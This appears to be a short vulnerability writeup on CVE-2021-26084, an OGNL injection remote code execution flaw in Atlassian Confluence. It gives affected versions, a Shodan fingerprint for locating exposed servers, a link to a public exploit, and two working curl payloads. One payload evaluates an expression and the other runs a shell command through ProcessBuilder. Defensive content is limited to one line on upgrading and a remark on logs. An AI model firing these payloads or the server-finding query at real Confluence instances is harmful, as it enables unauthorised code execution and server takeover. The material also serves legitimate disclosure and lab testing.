Atlassian Confluence Vulnerability Overview
Atlassian Confluence is a professional enterprise knowledge management and collaboration software produced by Atlassian, which can be used to build enterprise document libraries and more. On August 26, 2021, Atlassian officially announced the disclosure of CVE-2021-26084 Atlassian Confluence Remote Code Execution Vulnerability. Attackers can construct malicious requests after authentication or in some scenarios without authentication, causing OGNL expression injection, thereby executing arbitrary code and controlling the server.
Affected Versions of Atlassian Confluence
- Atlassian Confluence Server/Data Center < 6.13.23
- 6.14.0 ≤ Atlassian Confluence Server/Data Center < 7.4.11
- 7.5.0 ≤ Atlassian Confluence Server/Data Center < 7.11.6
- 7.12.0 ≤ Atlassian Confluence Server/Data Center < 7.12.5
Shodan Search Syntax for Atlassian Confluence
http.favicon.hash:-305179312
Vulnerability Exploit
https://github.com/r0ckysec/CVE-2021-26084_Confluence
Vulnerability Environment Setup
Use vulhub for setup.
Vulnerability Reproduction
Directly send the packet and get the calculation result of 233*233.
curl -X POST -d 'queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027' http://vul.zgao.top:8090/pages/doenterpagevariables.action 2>/dev/null | grep -C3 54289
curl -X POST -d 'queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027' http://vul.zgao.top:8090/pages/doenterpagevariables.action 2>/dev/null | grep -C3 uid=
Intrusion Traceability
Confluence itself does not have logs of web requests, and other components need to be relied on for investigation.
Fix Method
Upgrade Confluence to the latest version.